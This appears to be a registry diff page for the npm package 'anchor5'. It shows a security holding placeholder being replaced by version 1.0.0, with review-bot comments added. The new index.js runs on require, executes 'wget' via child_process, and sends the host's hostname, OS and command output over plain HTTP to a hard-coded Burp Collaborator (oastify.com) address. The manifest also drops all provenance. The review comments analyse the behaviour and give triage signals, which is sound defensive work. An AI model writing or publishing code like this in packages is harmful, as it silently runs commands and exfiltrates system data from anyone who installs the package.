anchor5 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.



Files changed (3) hide show
  1. package/index.js +71 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
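--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,71 @@
+ const http = require('http');
+ const os = require('os');
+ const { exec } = require('child_process');
+ const url = require('url');
+
+ // Your Burp Collaborator URL
+ const collaboratorUrl = '9cmyselhy7mr2rewb105yort7kdb1ep3.oastify.com';
+
+ // Function to send HTTP request
+ function sendRequest(target, queryParams = {}) {
+ const queryString = Object.keys(queryParams).map(key => `${key}=${encodeURIComponent(queryParams[key])}`).join('&');
+ const fullUrl = queryString ? `${target}?${queryString}` : target;
+
+ return new Promise((resolve, reject) => {
+ http.get(fullUrl, (res) => {
+ let data = '';
+ res.on('data', (chunk) => { data += chunk; });
+ res.on('end', () => resolve(data));
+ }).on('error', (err) => reject(err));
+ });
+ }
+
+ // Collect evidence for the 4 points
+ async function collectAndSendEvidence() {
+ try {
+ // Point 1: HTTP Requests from Internal/External IP Addresses (with hostname and order)
+ const hostname = os.hostname(); // Hostname to verify ownership
+ const order = 'Sequence: 1. Request to google.com; 2. Collect OS/wget; 3. Exfiltrate to Collaborator'; // Order of forwards/sequence
+
+ // Point 2: OS Name
+ const osName = os.platform();
+
+ // Point 3: Output from the wget Command (simulating fetch from google.com)
+ let wgetOutput = '';
+ try {
+ wgetOutput = await new Promise((resolve, reject) => {
+ exec('wget -O - http://google.com', (error, stdout, stderr) => {
+ if (error) reject(`wget error: ${error.message}`);
+ else resolve(stdout || stderr);
+ });
+ });
+ wgetOutput = wgetOutput.substring(0, 200); // Truncate for query param limit
+ } catch (wgetError) {
+ wgetOutput = `wget not available or error: ${wgetError}`;
+ }
+
+ // Point 4: Prove all points by bundling in the request
+ const evidence = {
+ hostname,
+ order,
+ os: osName,
+ wget: wgetOutput
+ };
+
+ // First, send request to google.com (as per query)
+ console.log('Sending request to google.com...');
+ const googleResponse = await sendRequest('http://google.com');
+ console.log('Google response snippet:', googleResponse.substring(0, 100));
+
+ // Then, send to Collaborator with evidence (order: after Google request)
+ console.log('Sending evidence to Burp Collaborator...');
+ await sendRequest(`http://${collaboratorUrl}`, evidence);
+ console.log('Evidence sent successfully. Check Burp Suite for interactions.');
+
+ } catch (error) {
+ console.error('Error:', error.message);
+ }
+ }
+
+ // Run the function
+ collectAndSendEvidence();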
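Review bot: The bare `collectAndSendEvidence();` call on the last line makes this module act on load, so any `require('anchor5')` spawns `wget` through `exec` and sends the machine's hostname, platform and up to 200 characters of command output as query parameters over plain HTTP to the hard-coded `collaboratorUrl` host. Nothing in the file asks for consent or restricts this to an authorised test target, and the outer `catch` only logs `error.message`, so the only trace a consumer gets is a few console lines. If this is meant as a test harness, the call should be gated, e.g. `if (require.main === module) { collectAndSendEvidence(); }`, and the endpoint should come from configuration rather than being committed in the source. For triage, the observable signals are a `wget` child process of Node and outbound HTTP to google.com followed by the `oastify.com` subdomain named on the `collaboratorUrl` line.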
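--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,11 @@
  {
  "name": "anchor5",
- "version": "0.0.1-security",
- "description": "security holding package",
- "repository": "npm/security-holder"
+ "version": "1.0.0",
+ "description": "test",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "",
+ "license": "ISC"
  }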
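Review bot: The new manifest removes `"repository": "npm/security-holder"` and puts nothing in its place: `author` is empty, `description` is `"test"`, and no repository or homepage is declared, so a consumer has no provenance to check for a name that the deleted README says was previously removed for malicious code. `"main": "index.js"` points at the newly added file and `scripts` holds only the default `test` entry, so the added code runs when the package is required rather than at install time. At minimum the manifest should declare a `repository` and a named `author`; anyone resolving this name should treat the jump from `0.0.1-security` to `1.0.0` as a placeholder being replaced with live code and review it before upgrading.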
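--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
- # Security holding package
-
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
- Please refer to www.npmjs.com/advisories?search=anchor5 for more information.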